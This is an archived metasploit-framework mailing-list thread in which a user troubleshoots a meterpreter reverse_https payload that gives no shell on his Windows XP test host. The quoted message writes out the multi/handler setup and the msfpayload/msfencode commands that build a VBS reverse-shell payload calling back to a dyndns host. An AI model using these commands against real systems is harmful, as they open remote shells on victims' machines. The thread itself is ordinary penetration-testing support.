|Main Archive Page > Month Archives > metasploit-framework archives|
Just a update.
After trying a standalone payload that was set for my private ip it
worked fine so there must be a problem on my end stopping it from
-- Mr R Birtles
On 19 May 2010 00:03, ricky-lee birtles <email@example.com> wrote:
> Is  broken for anyone else?
> Here is how things are set up.
> on my box I use -r to load the following file contents.
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_https
> set LPORT 8081
> set LHOST [dyndns-host]
> set ExitOnSession false
> exploit -j
> I create a standalone payload using the following commands:
> ./msfpayload windows/meterpreter/reverse_https LHOST=[dyndns-host]
> LPORT=8081 R |
> ./msfencode -t loop-vbs -o final.vbs
> and use smb to transfer it across to my test host [windows xp]
> When the vbs file is run I receive no shell.
> After looking at traffic with wireshark I can see a dns call to find
> the destination host,
> then traffic that should be for port 8081 but there is no content to
> the traffic when you
> look closer at the stream.
> I have used http://www.canyouseeme.org/ to check the port is
> accessable as well as made
> sure the router is forwarding the port my way.
> [Note. I could be missing something simple because I am a bit tired]
> -- Mr R Birtles